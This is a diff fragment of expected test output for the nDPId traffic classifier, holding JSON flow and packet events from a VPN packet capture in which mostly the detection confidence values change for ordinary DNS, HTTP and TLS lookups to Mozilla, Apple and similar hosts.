+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1569687267493,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569687267493,"pkt":"NDY7z3UoLH6BsEqhCABFAABJAABAADoRnytLS0tLCgAA4wA136UANZKzv52BgAABAAEAAAAAB21vemlsbGEDb3JnAAABAAHADAABAAEAAAAaAAQ\/9dDD"} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1569687267500,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1569687267500,"pkt":"NDY7z3UoLH6BsEqhCABFAADkAABAADoRnpBLS0tLCgAA4wA189sA0PLn7RaBgAABAAUAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQABwAwABQABAAAAIwAeDGRldGVjdHBvcnRhbARwcm9kBm1vemF3cwNuZXQAwDYABQABAAAADgAoDGRldGVjdHBvcnRhbAdmaXJlZm94BmNvbS12MgllZGdlc3VpdGXAT8BgAAUAAQAAUnoAFAVhMTA4OQRkc2NkBmFrYW1hacBPwJQAAQABAAAACQAEuBk4UsCUAAEAAQAAAAkABLgZODM="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"} @@ -209,74 +209,75 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAAA72BEAAP8RQicKAADjS0tLS+u1ADUAJxlWhe8BAAABAAAAAAAAA3d3dwVhcHBsZQNjb20AAAEAAQ=="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAABGM9oAAP8R5lMKAADjS0tLS8d0ADUAMjjn9V4BAAABAAAAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQAB"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1569687267800,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687267800,"pkt":"LH6BsEqhNDY7z3UoCABFAABOdGcAAP8Rpb4KAADjS0tLS+i+ADUAOr+fEJABAAABAAAAAAAACTEtY291cmllcgdzYW5kYm94BHB1c2gFYXBwbGUDY29tAAABAAE="} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267800,"flow_last_seen":1569687267800,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1569687267800,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1569687267805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687267805,"pkt":"LH6BsEqhNDY7z3UoCABFAABHoW4AAP8ReL4KAADjS0tLS\/rBADUAMyCpE94BAAABAAAAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAQ=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267805,"flow_last_seen":1569687267805,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569687267805,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1569687267812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1569687267812,"pkt":"LH6BsEqhNDY7z3UoCABFAAA9PxQAAP8R2yIKAADjS0tLS8sWADUAKZk5eJ4BAAABAAAAAAAABG1haWwGdmlhc2F0A2NvbQAAAQAB"} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267812,"flow_last_seen":1569687267812,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267812,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mail.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1569687267814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1569687267814,"pkt":"NDY7z3UoLH6BsEqhCABFAADSAABAADoRnqJLS0tLCgAA4wA167UAvhHNhe+BgAABAAQAAAAAA3d3dwVhcHBsZQNjb20AAAEAAcAMAAUAAQAABRUAGwN3d3cFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AMArAAUAAQAAFoEALwN3d3cFYXBwbGUDY29tB2VkZ2VrZXkDbmV0C2dsb2JhbHJlZGlyBmFrYWRuc8BBwFIABQABAAAE7QAZBWU2ODU4BWRzY2U5CmFrYW1haWVkZ2XAQcCNAAEAAQAAAAcABLgbc6E="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687267814,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.27.115.161"}} 